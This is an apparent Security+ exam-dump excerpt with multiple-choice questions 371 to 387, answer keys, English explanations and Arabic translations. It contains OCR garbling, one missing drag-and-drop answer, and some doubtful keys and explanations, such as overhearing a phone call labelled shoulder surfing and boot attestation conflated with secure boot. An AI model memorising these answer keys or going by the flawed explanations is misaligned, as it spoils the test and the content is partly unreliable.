A. Open permissions
B. Default settings
C. API integration configuration
D. Weak encryption
Answer: B
Explanation:
Before connecting security devices to the network, it is crucial to address default settings first.
Manufacturers often ship devices with default settings that include default usernames, passwords, and
configurations. These settings are widely known and can be easily exploited by attackers. Changing
default settings helps to secure the device and prevent unauthorized access.
‫أي مما يلي ينبغي معالجته أولا على أجهزة الأمان قبل الاتصال بالشبكة؟ الإعدادات الافتراضية‬.371
‫ غالبا ما تقوم الشركات المصنعة‬.‫ من الضروري معالجة الإعدادات الافتراضية أولا‬، ‫ قبل توصيل أجهزة الأمان بالشبكة‬:‫تفسير‬
‫ هذه‬.‫بشحن الأجهزة ذات الإعدادات الافتراضية التي تتضمن أسماء المستخدمين وكلمات المرور والتكوينات الافتراضية‬
‫ يساعد تغيير الإعدادات الافتراضية على‬.‫الإعدادات معروفة على نطاق واسع ويمكن استغلالها بسهولة من قبل المهاجمين‬
.‫تأمين الجهاز ومنع الوصول غير المصرح به‬
372.A security administrator Installed a new web server. The administrator did this to Increase the
capacity (or an application due to resource exhaustion on another server.
Which of the following algorithms should the administrator use to split the number of the connections on
each server In half?
A. Weighted response
B. Round-robin
C. Least connection
D. Weighted least connection
Answer: B
Explanation:
The administrator should use a round-robin algorithm to split the number of connections on each server
in half. Round-robin is a load-balancing algorithm that distributes incoming requests to the available
servers one by one in a cyclical order. This helps to evenly distribute the load across all of the servers,
ensuring that no single server is overloaded.
‫ قام المسؤول بذلك لزيادة السعة (أو تطبيق بسبب استنفاد الموارد على خادم‬.‫ مسؤول الأمن تثبيت خادم ويب جديد‬A.372
‫ أي من الخوارزميات التالية يجب أن يستخدمها المسؤول لتقسيم عدد الاتصالات على كل خادم إلى النصف؟ جولة روبن‬.‫آخر‬
robin-Round .‫ يجب على المسؤول استخدام خوارزمية مستديرة لتقسيم عدد الاتصالات على كل خادم إلى النصف‬:‫تفسير‬
‫ يساعد هذا في‬.‫هي خوارزمية موازنة التحميل التي توزع الطلبات الواردة على الخوادم المتاحة واحدة تلو الأخرى بترتيب دوري‬
.‫ مما يضمن عدم تحميل أي خادم بشكل زائد‬، ‫توزيع الحمل بالتساوي عبر جميع الخوادم‬
206 / 198
The safer , easier way to help you pass any IT exams.
373.A company has numerous employees who store PHI data locally on devices. The Chief Information
Officer wants to implement a solution to reduce external exposure of PHI but not affect the business.
The first step the IT team should perform is to deploy a DLP solution:
A. for only data in transit.
B. for only data at reset.
C. in blocking mode.
D. in monitoring mode.
Answer: D
Explanation:
A DLP solution in monitoring mode is a good first step to deploy for data loss prevention. It allows the IT
team to observe and analyze the data flows and activities without blocking or interfering with them. It
helps to identify the sources and destinations of sensitive data, the types and volumes of data involved,
and the potential risks and violations. It also helps to fine-tune the DLP policies and rules before
switching to blocking mode, which can disrupt business operations if not configured properly.
‫ يريد كبير‬.‫ لدى شركة لديها العديد من الموظفين الذين يخزنون بيانات المعلومات الصحية المحمية محليا على الأجهزة‬-373
‫ الخطوة‬.‫موظفي المعلومات تنفيذ حل لتقليل التعرض الخارجي للمعلومات الصحية المحمية ولكن لا يؤثر على الأعمال‬
.‫ في وضع المراقبة‬:DLP ‫الأولى التي يجب على فريق تكنولوجيا المعلومات تنفيذها هي نشر حل‬
‫ يسمح لفريق تكنولوجيا المعلومات‬.‫ في وضع المراقبة خطوة أولى جيدة للنشر لمنع فقدان البيانات‬DLP ‫ يعد حل‬:‫تفسير‬
، ‫ يساعد على تحديد مصادر ووجهات البيانات الحساسة‬.‫بمراقبة وتحليل تدفقات البيانات والأنشطة دون حظرها أو التدخل فيها‬
‫ قبل التبديل‬DLP ‫ كما أنه يساعد على ضبط سياسات وقواعد‬.‫ والمخاطر والانتهاكات المحتملة‬، ‫وأنواع وأحجام البيانات المعنية‬
.‫ مما قد يؤدي إلى تعطيل العمليات التجارية إذا لم يتم تكوينها بشكل صحيح‬، ‫إلى وضع الحظر‬
207 / 198
The safer , easier way to help you pass any IT exams.
374. The application development team is in the final stages of developing a new healthcare application.
The team has requested copies of current PHI records to perform the final testing.
Which of the following would be the best way to safeguard this information without impeding the testing
process?
A. Implementing a content filter
B. Anonymizing the data
C. Deploying DLP tools
D. Installing a FIM on the application server
Answer: B
Explanation:
Anonymizing the data is the process of removing personally identifiable information (PII) from data sets,
so that the people whom the data describe remain anonymous12. Anonymizing the data can safeguard
the PHI records without impeding the testing process, because it can protect the privacy of the patients
while preserving the data integrity and statistical accuracy for the application development team12.
Anonymizing the data can be done by using techniques such as data masking, pseudonymization,
generalization, data swapping, or data perturbation12.
Implementing a content filter is not the best way to safeguard the information, because it is a technique
that blocks or allows access to certain types of content based on predefined rules or policies3. A content
filter does not remove or encrypt PII from data sets, and it may not prevent unauthorized access or
leakage of PHI records.
Deploying DLP tools is not the best way to safeguard the information, because it is a technique that
monitors and prevents data exfiltration or transfer to unauthorized destinations or users. DLP tools do not
remove or encrypt PII from data sets, and they may not be sufficient to protect PHI records from internal
misuse or negligence.
Installing a FIM on the application server is not the best way to safeguard the information, because it is a
technique that detects and alerts changes to files or directories on a system. FIM does not remove or
encrypt PII from data sets, and it may not prevent unauthorized access or modification of PHI records.
PHI ‫ طلب الفريق نسخا من سجلات‬.‫فريق تطوير التطبيقات في المراحل النهائية من تطوير تطبيق جديد للرعاية الصحية‬
‫ أي مما يلي سيكون أفضل طريقة لحماية هذه المعلومات دون إعاقة عملية الاختبار؟‬.‫الحالية لإجراء الاختبار النهائي‬
‫إخفاء هوية البيانات‬
‫ بحيث يظل الأشخاص‬،‫) من مجموعات البيانات‬PII( ‫ إخفاء هوية البيانات هو عملية إزالة معلومات التعريف الشخصية‬:‫تفسير‬
‫ يمكن أن يؤدي إخفاء هوية البيانات إلى حماية سجلات المعلومات الصحية المحمية دون‬.12‫الذين تصفهم البيانات مجهولين‬
‫ لأنه يمكن أن يحمي خصوصية المرضى مع الحفاظ على سلامة البيانات والدقة الإحصائية لفريق تطوير‬، ‫إعاقة عملية الاختبار‬
‫ يمكن إخفاء هوية البيانات باستخدام تقنيات مثل إخفاء البيانات أو الاسم المستعار أو التعميم أو تبادل البيانات أو‬.12 ‫التطبيق‬
.12‫اضطراب البيانات‬
‫ لأنه أسلوب يحظر أو يسمح بالوصول إلى أنواع معينة‬،‫لا يعد تنفيذ عامل تصفية المحتوى أفضل طريقة لحماية المعلومات‬
‫ لا يقوم عامل تصفية المحتوى بإزالة معلومات تحديد الهوية‬.3‫من المحتوى استنادا إلى قواعد أو سياسات محددة مسبقا‬
‫ وقد لا يمنع الوصول غير المصرح به أو تسرب سجلات المعلومات الصحية‬، ‫الشخصية أو تشفيرها من مجموعات البيانات‬
‫ لأنها تقنية تراقب وتمنع استخراج البيانات أو نقلها إلى‬، ‫ أفضل طريقة لحماية المعلومات‬DLP ‫ لا يعد نشر أدوات‬.‫المحمية‬
‫ بإزالة أو تشفير معلومات تحديد الهوية الشخصية من مجموعات‬DLP ‫ لا تقوم أدوات‬.‫وجهات أو مستخدمين غير مصرح لهم‬
.‫ من سوء الاستخدام الداخلي أو الإهمال‬PHI ‫ وقد لا تكون كافية لحماية سجلات‬، ‫البيانات‬
‫ لأنها تقنية تكتشف وتنبه التغييرات التي تطرأ على‬، ‫ على خادم التطبيقات أفضل طريقة لحماية المعلومات‬FIM ‫لا يعد تثبيت‬
‫ وقد لا‬، ‫ بإزالة أو تشفير معلومات تحديد الهوية الشخصية من مجموعات البيانات‬FIM ‫ لا تقوم‬.‫الملفات أو الدلائل على النظام‬
.‫تمنع الوصول غير المصرح به أو تعديل سجلات المعلومات الصحية المحمية‬
208 / 198
The safer , easier way to help you pass any IT exams.
375. An organization is concerned about hackers potentially entering a facility and plugging in a remotely
accessible Kali Linux box.
Which of the following should be the first lines of defense against such an attack? (Select TWO).
A. MAC filtering
B. Zero trust segmentation
C. Network access control
D. Access control vestibules
E. Guards
F. Bollards.
Answer: A,C
Explanation:
MAC filtering is a method of allowing or denying access to a network based on the MAC address of the
device attempting to connect. By creating a list of approved MAC addresses, the organization can
prevent unauthorized devices from connecting to the network.
Network Access Control (NAC) is a security solution that allows organizations to restrict access to their
networks based on the device's identity, configuration, and security posture. This can be used to ensure
that only legitimate devices are allowed to connect to the network, and any unauthorized devices are
blocked.
‫ أي من الآتي‬.‫تشعر إحدى المنظمات بالقلق إزاء احتمال دخول المتسللين إلى منشأة وتوصيل صندوق كالي لينكس يمكن الوصول إليه عن بعد‬
.)‫يجب أن يكون خطوط الدفاع الأولى ضد مثل هذا الهجوم؟ (اختر اثنين‬
‫ _ التحكم في الوصول إلى الشبكة‬MAC ‫تصفية‬
‫ من خلال إنشاء قائمة‬.‫ للجهاز الذي يحاول الاتصال‬MAC ‫ هي طريقة للسماح أو رفض الوصول إلى شبكة بناء على عنوان‬MAC ‫ تصفية‬:‫تفسير‬
‫) هو حل أمني‬NAC( ‫ التحكم في الوصول إلى الشبكة‬.‫ يمكن للمؤسسة منع الأجهزة غير المصرح بها من الاتصال بالشبكة‬،‫ المعتمدة‬MAC ‫بعناوين‬
‫ يمكن استخدام هذا لضمان السماح للأجهزة الشرعية‬.‫يسمح للمؤسسات بتقييد الوصول إلى شبكاتها بناء على هوية الجهاز وتكوينه ووضعه الأمني‬
.‫ وحظر أي أجهزة غير مصرح بها‬، ‫فقط بالاتصال بالشبكة‬
376. Which of the following cloud models provides clients with servers, storage, and networks but nothing
else?
A. SaaS
B. PaaS
C. laaS
D. DaaS
Answer: C
Explanation:
laaS (Infrastructure as a Service) is a cloud model that provides clients with servers, storage, and
networks but nothing else. It allows clients to have more control and flexibility over the configuration and
management of their infrastructure resources, but also requires them to install and maintain their own
operating systems, applications, etc.
‫أي من النماذج السحابية التالية يوفر للعملاء الخوادم والتخزين والشبكات ولكن لا شيء آخر؟ لاس‬
‫ يسمح‬.‫ (البنية التحتية كخدمة) هو نموذج سحابي يوفر للعملاء الخوادم والتخزين والشبكات ولكن لا شيء آخر‬laaS :‫تفسير‬
‫ ولكنه يتطلب منهم أيضا تثبيت وصيانة‬، ‫للعملاء بمزيد من التحكم والمرونة في تكوين وإدارة موارد البنية التحتية الخاصة بهم‬
.‫مواردهم الخاصة أنظمة التشغيل والتطبيقات وما إلى ذلك‬
209 / 198
The safer , easier way to help you pass any IT exams.
377.A systems analyst is responsible for generating a new digital forensics chain -of- custody form.
Which of the following should the analyst include in this documentation? (Select two).
A. The order of volatility
B. A forensics NDA
C. The provenance of the artifacts
D. The vendor's name
E. The date and time
F. A warning banner
Answer: C, E
Explanation:
A digital forensics chain-of-custody form is a document that records the chronological and logical
sequence of custody, control, transfer, analysis, and disposition of digital evidence.
A digital forensics chain-of-custody form should include the following information:
✑ The provenance of the artifacts: The provenance of the artifacts refers to the origin and history of the
digital evidence, such as where, when, how, and by whom it was collected, handled, analyzed, or
otherwise controlled.
✑ The date and time: The date and time refer to the specific moments when the digital evidence was
collected, handled, analyzed, transferred, or disposed of by each person involved in the chain of custody.
Other information that may be included in a digital forensics chain-of-custody form are:
✑ The identification of the artifacts: The identification of the artifacts refers to the unique identifiers or
labels assigned to the digital evidence, such as serial numbers, barcodes, hashes, or descriptions.
✑ The signatures of the custodians: The signatures of the custodians refer to the names and signatures
of each person who had custody or control of the digital evidence at any point in the chain of custody.
✑ The location of the artifacts: The location of the artifacts refers to the physical or logical places where
the digital evidence was stored or processed, such as a lab, a server, a cloud service, or a device.
‫ أي مما يلي‬.‫ ويتولى محلل النظم مسؤولية وضع استمارة جديدة لسلسلة العهدة في مجال الطب الشرعي الرقمي‬-377
‫ مصدر القطع الأثرية _ التاريخ والوقت‬.)‫يجب على المحلل تضمينه في هذه الوثائق؟ (حدد اثنين‬
‫ نموذج سلسلة الحيازة للطب الشرعي الرقمي هو مستند يسجل التسلسل الزمني والمنطقي للحفظ والتحكم والنقل‬:‫تفسير‬
✑ :‫ يجب أن يتضمن نموذج سلسلة العهدة للطب الشرعي الرقمي المعلومات التالية‬.‫والتحليل والتخلص من الأدلة الرقمية‬
‫ مثل أين ومتى وكيف ومن تم جمعها أو‬، ‫ يشير مصدر القطع الأثرية إلى أصل وتاريخ الأدلة الرقمية‬:‫مصدر القطع الأثرية‬
‫ يشير التاريخ والوقت إلى اللحظات المحددة التي تم‬:‫ ✑ التاريخ والوقت‬.‫التعامل معها أو تحليلها أو التحكم فيها بطريقة أخرى‬
.‫فيها جمع الأدلة الرقمية أو التعامل معها أو تحليلها أو نقلها أو التخلص منها من قبل كل شخص مشارك في سلسلة العهدة‬
:‫المعلومات الأخرى التي يمكن تضمينها في نموذج سلسلة الحيازة للطب الشرعي الرقمي هي‬
‫ مثل‬، ‫ يشير تحديد القطع الأثرية إلى المعرفات أو الملصقات الفريدة المخصصة للأدلة الرقمية‬:‫✑ تحديد القطع الأثرية‬
.‫الأرقام التسلسلية أو الرموز الشريطية أو التجزئة أو الأوصاف‬
‫ تشير توقيعات الأوصياء إلى أسماء وتوقيعات كل شخص كان لديه حراسة أو سيطرة على الأدلة‬:‫✑ توقيعات الأوصياء‬
.‫الرقمية في أي نقطة في سلسلة العهدة‬
‫ يشير موقع القطع الأثرية إلى الأماكن المادية أو المنطقية التي تم فيها تخزين الأدلة الرقمية أو‬:‫✑ موقع القطع الأثرية‬
.‫ مثل المختبر أو الخادم أو الخدمة السحابية أو الجهاز‬، ‫معالجتها‬
210 / 198
The safer , easier way to help you pass any IT exams.
378.A research company discovered that an unauthorized piece of software has been detected on a
small number of machines in its lab The researchers collaborate with other machines using port 445 and
on the internet using port 443 The unau-thorized software is starting to be seen on additional machines
outside of the lab and is making outbound communications using HTTPS and SMS. The security team
has been instructed to resolve the issue as quickly as possible while causing minimal disruption to the
researchers.
Which of the following is the best course Of action in this scenario?
A. Update the host firewalls to block outbound Stv1B.
B. Place the machines with the unapproved software in containment
C. Place the unauthorized application in a Bocklist.
D. Implement a content filter to block the unauthorized software communication,
Answer: B
Explanation:
Containment is an incident response strategy that aims to isolate and prevent the spread of an attack or
compromise within a network or system. It can resolve the issue of unauthorized software detected on a
small number of machines in a lab as quickly as possible while causing minimal disruption to the
researchers by stopping the software from communicating with external sources using HTTPS and SMS
and preventing it from infecting additional machines outside of the lab
‫ اكتشفت شركة أبحاث أنه تم اكتشاف برنامج غير مصرح به على عدد صغير من الآلات في مختبرها يتعاون الباحثون مع‬-378
‫ بدأ ظهور البرنامج غير المألوف على أجهزة إضافية خارج‬443 ‫ وعلى الإنترنت باستخدام المنفذ‬445 ‫آلات أخرى تستخدم المنفذ‬
‫ تم توجيه فريق الأمن لحل المشكلة في أسرع وقت ممكن مع‬.SMS ‫ و‬HTTPS ‫المختبر و يقوم بإجراء اتصالات صادرة باستخدام‬
‫ أي مما يلي هو أفضل مسار للعمل في هذا السيناريو؟‬.‫التسبب في الحد الأدنى من الاضطراب للباحثين‬
‫ضع الآلات مع البرنامج غير المعتمد في الاحتواء‬
‫ يمكنه حل‬.‫ الاحتواء هو استراتيجية استجابة للحوادث تهدف إلى عزل ومنع انتشار هجوم أو اختراق داخل شبكة أو نظام‬:‫تفسير‬
‫مشكلة البرامج غير المصرح بها التي تم اكتشافها على عدد صغير من الأجهزة في المختبر في أسرع وقت ممكن مع التسبب‬
SMS ‫ و‬HTTPS ‫في الحد الأدنى من الاضطراب للباحثين عن طريق منع البرنامج من التواصل مع المصادر الخارجية باستخدام‬
‫ومنعه من إصابة أجهزة إضافية خارج المختبر‬
211 / 198
The safer , easier way to help you pass any IT exams.
379.A contractor overhears a customer recite their credit card number during a confidential phone call.
The credit card Information is later used for a fraudulent transaction.
Which of the following social engineering techniques describes this scenario?
A. Shoulder surfing
B. Watering hole
C. Vishing
D. Tailgating
Answer: A
Explanation:
Shoulder surfing is a social engineering technique that involves looking over someone’s shoulder to see
what they are typing, writing, or viewing on their screen. It can be used to steal passwords, PINs, credit
card numbers, or other sensitive information. In this scenario, the contractor used shoulder surfing to
overhear the customer’s credit card number during a phone call.
‫ يتم استخدام معلومات بطاقة الائتمان لاحقا‬.‫ يسمع مقاول زبونا يتلو رقم بطاقته الائتمانية خلال مكالمة هاتفية سرية‬-379
‫ أي أساليب الهندسة الاجتماعية الآتية تصف هذا السيناريو؟ ركوب الأمواج على الكتف‬.‫في معاملة احتيالية‬
‫ تصفح الكتف هو أسلوب هندسة اجتماعية يتضمن النظر من فوق كتف شخص ما لمعرفة ما يكتبه أو يكتبه أو يشاهده‬:‫تفسير‬
‫ يمكن استخدامه لسرقة كلمات المرور أو أرقام التعريف الشخصية أو أرقام بطاقات الائتمان أو غيرها من‬.‫على شاشته‬
‫ استخدم المقاول تصفح الكتف لسماع رقم بطاقة ائتمان العميل أثناء مكالمة‬، ‫ في هذا السيناريو‬.‫المعلومات الحساسة‬
.‫هاتفية‬
380. Audit logs indicate an administrative account that belongs to a security engineer has been locked
out multiple times during the day. The security engineer has been on vacation (or a few days.
Which of the following attacks can the account lockout be attributed to?
A. Backdoor
B. Brute-force
C. Rootkit
D. Trojan
Answer: B
Explanation:
The account lockout can be attributed to a brute-force attack. A brute-force attack is a type of attack
where an attacker attempts to guess a user's password by continually trying different combinations of
characters. In this case, it is likely that the security engineer's account was locked out due to an attacker
attempting to guess their password. Backdoor, rootkit, and Trojan attacks are not relevant in this
scenario.
‫ كان مهندس‬.‫تشير سجلات التدقيق إلى أن الحساب الإداري الذي ينتمي إلى مهندس أمان قد تم حظره عدة مرات خلال اليوم‬
‫ أي من الهجمات التالية يمكن أن يعزى إليها تأمين الحساب؟ القوة الغاشمة‬.‫الأمن في إجازة (أو بضعة أيام‬
‫ هجوم القوة الغاشمة هو نوع من الهجوم حيث يحاول‬.‫ يمكن أن يعزى إغلاق الحساب إلى هجوم القوة الغاشمة‬: ‫تفسير‬
‫ من المحتمل‬، ‫ في هذه الحالة‬.‫المهاجم تخمين كلمة مرور المستخدم من خلال تجربة مجموعات مختلفة من الأحرف باستمرار‬
‫ هجمات الباب الخلفي‬.‫أن يكون حساب مهندس الأمن قد تم قفله بسبب محاولة أحد المهاجمين تخمين كلمة المرور الخاصة به‬
.‫والجذور الخفية وأحصنة طروادة ليست ذات صلة في هذا السيناريو‬
212 / 198
The safer , easier way to help you pass any IT exams.
381. DRAG DROP
A security engineer is setting up password less authentication for the first time.
INSTRUCTIONS
Use the minimum set of commands to set this up and verify that it works. Commands cannot be reused.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All
button.
‫ تعليمات استخدم الحد الأدنى من مجموعة‬.‫سحب الإسقاط يقوم مهندس أمان بإعداد مصادقة أقل بكلمة مرور لأول مرة‬
‫ إذا كنت ترغب في أي وقت في إعادة الحالة الأولية‬.‫ لا يمكن إعادة استخدام الأوامر‬.‫الأوامر لإعداد هذا والتحقق من أنه يعمل‬
.‫ فالرجاء النقر فوق إعادة تعيين الكل زر‬، ‫للمحاكاة‬
Answer:
Explanation:
A screenshot of a computer
Description automatically generated with medium confidence
213 / 198
:‫تفسير‬
‫لقطة شاشة لجهاز كمبيوتر‬
‫الوصف الذي يتم إنشاؤه تلقائيا بثقة متوسطة‬
The safer , easier way to help you pass any IT exams.
382.A cyber security administrator is using iptables as an enterprise firewall. The administrator created
some rules, but the network now seems to be unresponsive. All connections are being dropped by the
firewall.
Which of the following would be the best option to remove the rules?
A. # iptables -t mangle -X
B. # iptables -F
C. # iptables -2
D. # iptables -P INPUT -j DROP
Answer: B
Explanation:
iptables is a command-line tool that allows an administrator to configure firewall rules for a Linux system.
The -F option flushes or deletes all the existing rules in the selected chain or in all chains if none is
given. It can be used to remove the rules that caused the network to be unresponsive and restore the
default firewall behavior.
‫ ولكن‬، ‫ قام المسؤول بإنشاء بعض القواعد‬.‫ كجدار حماية للمؤسسة‬iptables ‫ويستخدم مسؤول الأمن السيبراني أجهزة‬-382
‫ أي مما يلي سيكون الخيار الأفضل لإزالة‬.‫ يتم إسقاط جميع الاتصالات بواسطة جدار الحماية‬.‫يبدو أن الشبكة الآن لا تستجيب‬
‫القواعد؟ ابتيبل‬
‫ بمسح أو‬F- ‫ يقوم الخيار‬.Linux ‫ هي أداة سطر أوامر تسمح للمسؤول بتكوين قواعد جدار الحماية لنظام‬iptables :‫تفسير‬
‫ يمكن استخدامه لإزالة‬.‫حذف جميع القواعد الموجودة في السلسلة المحددة أو في كل السلاسل إذا لم يتم إعطاء أي منها‬
.‫القواعد التي تسببت في عدم استجابة الشبكة واستعادة سلوك جدار الحماية الافتراضي‬
383.Law enforcement officials sent a company a notification that states electronically stored information
and paper documents cannot be destroyed.
Which of the following explains this process?
A. Data breach notification
B. Accountability
C. Legal hold
D. Chain of custody
Answer: C
Explanation:
A legal hold is a process that requires an organization to preserve electronically stored information and
paper documents that are relevant to a pending or anticipated litigation or investigation. It suspends the
normal retention and destruction policies and procedures for such information and documents until the
legal hold is lifted or released.
‫ وأرسل الموظفون المكلفون بإنفاذ القوانين إلى إحدى الشركات إخطارا يفيد بأنه لا يمكن إتلاف المعلومات المخزنة‬-383
‫ أي مما يلي يفسر هذه العملية؟ تعليق قانوني‬.‫إلكترونيا والوثائق الورقية‬
‫ الحجز القانوني هو عملية تتطلب من المنظمة الاحتفاظ بالمعلومات المخزنة إلكترونيا والمستندات الورقية ذات الصلة‬:‫تفسير‬
‫ وهو يعلق سياسات وإجراءات الاحتفاظ والتدمير العادية لهذه المعلومات والوثائق‬.‫بالتقاضي أو التحقيق المعلق أو المتوقع‬
.‫إلى أن يتم رفع الحجز القانوني أو الإفراج عنه‬
214 / 198
The safer , easier way to help you pass any IT exams.
384.A customer called a company's security team to report that all invoices the customer has received
over the last five days from the company appear to have fraudulent banking details.
An investigation into the matter reveals the following
• The manager of the accounts payable department is using the same password across
multiple external websites and the corporate account
• One of the websites the manager used recently experienced a data breach.
• The manager's corporate email account was successfully accessed in the last five days by an IP
address located in a foreign country.
Which of the following attacks has most likely been used to compromise the manager's corporate
account?
A. Remote access Trojan
B. Brute-force
C. Dictionary
D. Credential stuffing
E. Password spraying
Answer: D
Explanation:
Credential stuffing is a type of attack that involves using stolen or leaked usernames and passwords
from one website or service to gain unauthorized access to other websites or services that use the same
credentials. It can exploit the common practice of reusing passwords across multiple accounts. It is the
most likely attack that has been used to compromise the manager’s corporate account, given that the
manager is using the same password across multiple external websites and the corporate account, and
one of the websites recently experienced a data breach.
‫ اتصل أحد العملاء بفريق الأمن التابع للشركة للإبلاغ عن أن جميع الفواتير التي تلقاها العميل خلال الأيام الخمسة‬-384
‫ يكشف التحقيق في الأمر ما يلي يستخدم مدير قسم‬.‫الماضية من الشركة يبدو أنها تحتوي على تفاصيل مصرفية احتيالية‬
‫الحسابات الدائنة نفس كلمة المرور عبر مواقع خارجية متعددة وحساب الشركة تعرض أحد مواقع الويب التي استخدمها‬
‫ تم الوصول إلى حساب البريد الإلكتروني للشركة للمدير بنجاح في الأيام الخمسة الماضية عن‬.‫المدير مؤخرا لخرق للبيانات‬
‫ أي من الهجمات التالية تم استخدامه على الأرجح لاختراق حساب شركة المدير؟‬.‫ موجود في بلد أجنبي‬IP ‫طريق عنوان‬
‫حشو بيانات الاعتماد‬
‫ حشو بيانات الاعتماد هو نوع من الهجوم يتضمن استخدام أسماء مستخدمين وكلمات مرور مسروقة أو مسربة من‬:‫تفسير‬
.‫موقع ويب أو خدمة واحدة للوصول غير المصرح به إلى مواقع الويب أو الخدمات الأخرى التي تستخدم نفس بيانات الاعتماد‬
‫ إنه الهجوم الأكثر احتمالا‬.‫يمكنه استغلال الممارسة الشائعة المتمثلة في إعادة استخدام كلمات المرور عبر حسابات متعددة‬
‫ نظرا لأن المدير يستخدم نفس كلمة المرور عبر مواقع ويب خارجية‬، ‫الذي تم استخدامه لاختراق حساب الشركة الخاص بالمدير‬
.‫ وقد تعرض أحد مواقع الويب مؤخرا لخرق البيانات‬، ‫متعددة وحساب الشركة‬
215 / 198
The safer , easier way to help you pass any IT exams.
385.A web architect would like to move a company's website presence to the cloud. One of the
management team's key concerns is resiliency in case a cloud provider's data center or network
connection goes down.
Which of the following should the web architect consider to address this concern?
A. Containers
B. Virtual private cloud
C. Segmentation
D. Availability zones
Answer: D
Explanation:
Availability zones are the most appropriate cloud feature to address the concern of resiliency in case a
cloud provider’s data center or network connection goes down. Availability zones are physically separate
locations within an Azure region that have independent power, cooling, and networking. Each availability
zone is made up of one or more data centers and houses infrastructure to support highly available,
mission-critical applications. Availability zones are connected with high-speed, private fiber-optic
networks. Azure services that support availability zones fall into two categories: Zonal services – you pin
the resource to a specific zone (for example, virtual machines, managed disks, IP addresses), or Zoneredundant services – platform replicates automatically across zones (for example, zone-redundant
storage, SQL Database). To achieve comprehensive business continuity on Azure, build your application
architecture using the combination of availability zones with Azure region pairs. You can synchronously
replicate your applications and data using availability zones within an Azure region for high-availability
and asynchronously replicate across Azure regions for disaster recovery protection.
‫ أحد الاهتمامات الرئيسية لفريق الإدارة هو المرونة‬.‫ يود مهندس ويب نقل وجود موقع الشركة على الويب إلى السحابة‬-385
‫ أي مما يلي يجب أن يفكر فيه مهندس الويب لمعالجة هذا‬.‫في حالة تعطل مركز بيانات مزود السحابة أو اتصال الشبكة‬
‫القلق؟‬
‫مناطق توافر الخدمات‬
‫ مناطق توافر الخدمات هي الميزة السحابية الأكثر ملاءمة لمعالجة مخاوف المرونة في حالة تعطل مركز بيانات مزود‬:‫التفسير‬
‫ تتمتع بالطاقة والتبريد‬Azure ‫ مناطق توافر الخدمات هي مواقع منفصلة فعليا داخل منطقة‬.‫السحابة أو اتصال الشبكة‬
‫ تتكون كل منطقة توافر خدمات من مركز بيانات واحد أو أكثر وتضم بنية تحتية لدعم التطبيقات عالية‬.‫والشبكات المستقلة‬
Azure ‫ تنقسم خدمات‬.‫ ترتبط مناطق توافر الخدمات بشبكات ألياف بصرية خاصة عالية السرعة‬.‫التوافر وذات المهام الحرجة‬
،‫ تقوم بتثبيت المورد بمنطقة معينة (على سبيل المثال‬- ‫ خدمات المناطق‬:‫التي تدعم مناطق توافر الخدمات إلى فئتين‬
‫ يقوم النظام الأساسي بالنسخ المتماثل‬- ‫) أو الخدمات الزائدة عن الحاجة‬IP ‫الأجهزة الظاهرية أو الأقراص المدارة أو عناوين‬
‫ لتحقيق استمرارية الأعمال الشاملة‬.)SQL ‫ قاعدة بيانات‬،‫ التخزين المتكرر للمنطقة‬،‫تلقائيا عبر المناطق (على سبيل المثال‬
‫ يمكنك‬.Azure ‫ قم ببناء بنية التطبيق الخاص بك باستخدام مجموعة من مناطق توافر الخدمات مع أزواج منطقة‬،Azure ‫على‬
‫ للتوفر العالي والنسخ المتماثل‬Azure ‫نسخ تطبيقاتك وبياناتك بشكل متزامن باستخدام مناطق توافر الخدمات داخل منطقة‬
.‫ للحماية من التعافي من الكوارث‬Azure ‫بشكل غير متزامن عبر مناطق‬
216 / 198
The safer , easier way to help you pass any IT exams.
386.A retail store has a business requirement to deploy a kiosk computer In an open area The kiosk
computer's operating system has been hardened and tested.
A security engineer IS concerned that someone could use removable media to install a rootkit Mich of
the should the security engineer configure to BEST protect the kiosk computer?
A. Measured boot
B. Boot attestation
C. UEFI
D. EDR
Answer: B
Explanation:
Boot attestation is a security feature that enables the computer to verify the integrity of its operating
system before it boots. It does this by performing a hash of the operating system and comparing it to the
expected hash of the operating system. If the hashes do not match, the computer will not boot and the
rootkit will not be allowed to run. This process is also known as measured boot or secure boot.
According to the CompTIA Security+ Study Guide, “Secure Boot is a feature of Unified Extensible
Firmware Interface (UEFI) that ensures that code that is executed during the boot process has been
authenticated by a cryptographic signature. Secure Boot prevents
malicious code from running at boot time, thus providing assurance that the system is executing only
code that is legitimate. This provides a measure of protection against rootkits and other malicious code
that is designed to run at boot time.”
‫ ويشترط على متجر البيع بالتجزئة أن ينشر حاسوب كشك في منطقة مفتوحة تم تقوية نظام تشغيل كمبيوتر الكشك‬-386
‫ مهندس أمن يشعر بالقلق من أن شخصا ما يمكن أن تستخدم وسائل الإعلام القابلة للإزالة لتثبيت الجذور الخفية‬.‫واختباره‬
‫ميتش من ينبغي أن مهندس الأمن تكوين لحماية أفضل كشك الكمبيوتر؟ شهادة التمهيد‬
‫ يقوم بذلك‬.‫ شهادة التمهيد هي ميزة أمان تمكن الكمبيوتر من التحقق من سلامة نظام التشغيل الخاص به قبل التمهيد‬:‫تفسير‬
‫ فلن يقوم‬، ‫ إذا لم تتطابق التجزئات‬.‫عن طريق إجراء تجزئة لنظام التشغيل ومقارنته بالتجزئة المتوقعة لنظام التشغيل‬
‫ وفقا‬.‫ تعرف هذه العملية أيضا باسم التمهيد المقاس أو التمهيد الآمن‬.‫الكمبيوتر بالتمهيد و لن يسمح بتشغيل الجذور الخفية‬
‫) التي‬UEFI( ‫ "التمهيد الآمن هو إحدى ميزات واجهة البرامج الثابتة الموسعة الموحدة‬، + Security CompTIA ‫لدليل دراسة‬
‫ التمهيد الآمن يمنع التعليمات‬.‫تضمن مصادقة التعليمات البرمجية التي يتم تنفيذها أثناء عملية التمهيد بواسطة توقيع تشفير‬
‫ يوفر هذا‬.‫ مما يوفر ضمانا بأن النظام ينفذ التعليمات البرمجية الشرعية فقط‬، ‫البرمجية الضارة من التشغيل في وقت التمهيد‬
.‫مقياسا للحماية ضد الجذور الخفية والتعليمات البرمجية الضارة الأخرى المصممة للتشغيل في وقت التمهيد‬
217 / 198
The safer , easier way to help you pass any IT exams.
387.A security administrator is compiling information from all devices on the local network in order to
gain better visibility into user activities.
Which of the following is the best solution to meet
this objective?
A. SIEM
B. HIDS
C. CASB
D. EDR
Answer: A
Explanation:
SIEM stands for Security Information and Event Management, which is a solution that can collect,
correlate, and analyze security logs and events from various devices on a network. SIEM can provide
better visibility into user activities by generating reports, alerts, dashboards, and metrics. SIEM can also
help detect and respond to security incidents, comply with regulations, and improve security posture.
